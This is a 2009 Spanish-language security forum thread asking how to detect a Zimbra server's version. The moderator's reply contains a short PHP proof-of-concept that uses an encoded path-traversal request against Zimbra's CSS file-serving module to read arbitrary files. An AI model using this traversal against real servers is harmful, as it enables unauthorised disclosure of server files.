elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:30  


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Averiguar Version de Zimbra
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Averiguar Version de Zimbra  (Leído 2,149 veces)
El As del Club Paris


Conectado Conectado

Mensajes: 1.816


Ver Perfil WWW
Averiguar Version de Zimbra
« en: 15 Diciembre 2009, 02:45 »

Hola, bueno queria saber si hay alguna forma de averiguar la version de un Zimbra..

Saludos
En línea

sudo suck --mycock -o force
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Averiguar Version de Zimbra
« Respuesta #1 en: 15 Diciembre 2009, 22:05 »

Hola, viendo el código fuente y esas cosas desde el demo de la web oficial no pude encontrar nada como para poder saber la versión de zimbra que está corriendo el servidor pero encontré un bug que al parecer es file disclosure pero no estoy seguro asi que hize un script:

Código
<?php
/* Archivo a visualizar */
$archivo = '/img/startup/ImgCalendarApp.gif';
$zimbra_url = 'http://www.testzimbra.com/zimbra/';
/* Solicitud */
$buffer = file_get_contents($zimbra_url.'css/ind/..%2f..'.str_replace('/', '%2f', $archivo).'?debug=1');
/* Imprime el contenido */
echo nl2br(htmlspecialchars($buffer, ENT_QUOTES));
?>

Lo que pasa es que cuando haces una peticion GET al directorio CSS lo que haces es llamar a un módulo que se encarga de abrir y mostrar archivos ya que puedes incluir múltiples cosas tal como se muestra en la inclusión de la hoja de estilo:

Código
<link
rel="stylesheet"
type="text/css" href="/zimbra/css/common,login,zhtml,skin.css?skin=beach&v=091213032217"
>
Cada coma es un nombre de archivo diferente y la extensión es común para todos y el valor al azar de la variable es para evitar el caché, asi que puedes llamar archivos pero no se como funcione bien ese servidor WEB pero ojala te sirva. Talves puedas encontrar archivos locales como el readme o licence o docs de ayuda internos que muestren algún valor de la versión.
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines